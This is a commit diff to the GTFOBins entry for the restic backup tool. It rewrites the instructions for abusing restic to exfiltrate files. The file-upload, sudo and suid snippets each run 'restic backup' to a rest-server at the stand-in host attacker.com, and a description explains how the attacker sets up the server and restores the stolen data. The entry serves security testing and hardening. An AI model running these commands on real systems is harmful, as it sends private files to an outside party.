Fix and improve restic

_gtfobins/restic.md

@@ -1,18 +1,41 @@
 ---
+description: |
+  The attacker must setup a server to receive the backups, in the following example [rest-server](https://github.com/restic/rest-server/) is used but there are other options. To start a new instance and create a new repository:
+
+  ```console
+  RPORT=12345
+  NAME=backup_name
+  ./rest-server --listen ":$RPORT"
+  restic init -r "rest:http://localhost:$RPORT/$NAME"
+  ```
+
+  To extract the data from the restic repository in the current directory on the attacker side:
+
+  ```console
+  restic restore -r "/tmp/restic/$NAME" latest --target .
+  ```
+
+  Upload data to the attacker server with the following commands.
 functions:
+  file-upload:
+    - code: |
+        RHOST=attacker.com
+        RPORT=12345
+        LFILE=file_or_dir_to_get
+        NAME=backup_name
+        restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
   sudo:
-    - description: Restic can be used to backup files. Run the commands in the sequence given below.
+    - code: |
-      code: |
+        RHOST=attacker.com
-        <!-- Attacker Machine -->
+        RPORT=12345
-        rest-server --no-auth --listen http://ATTACKER_IP:PORT
+        LFILE=file_or_dir_to_get
-        <!-- Victim Machine -->
+        NAME=backup_name
-        TARGET=rest_repository
+        sudo restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
-        BACKUP=file_or_directory_to_backup
+  suid:
-        sudo restic init -r rest:http://ATTACKER_IP:PORT/$TARGET
+    - code: |
-        sudo restic backup -r rest:http://ATTACKER_IP:PORT/$TARGET $BACKUP
+        RHOST=attacker.com
-        <!-- Attacker Machine -->
+        RPORT=12345
-        TARGET=rest_repository
+        LFILE=file_or_dir_to_get
-        DESTINATION=backup_to_restore
+        NAME=backup_name
-        mkdir /tmp/restic/$DESTINATION
+        ./restic backup -r "rest:http://$RHOST:$RPORT/$NAME" "$LFILE"
-        restic restore -r /tmp/restic/$TARGET latest --target /tmp/restic/$DESTINATION
 ---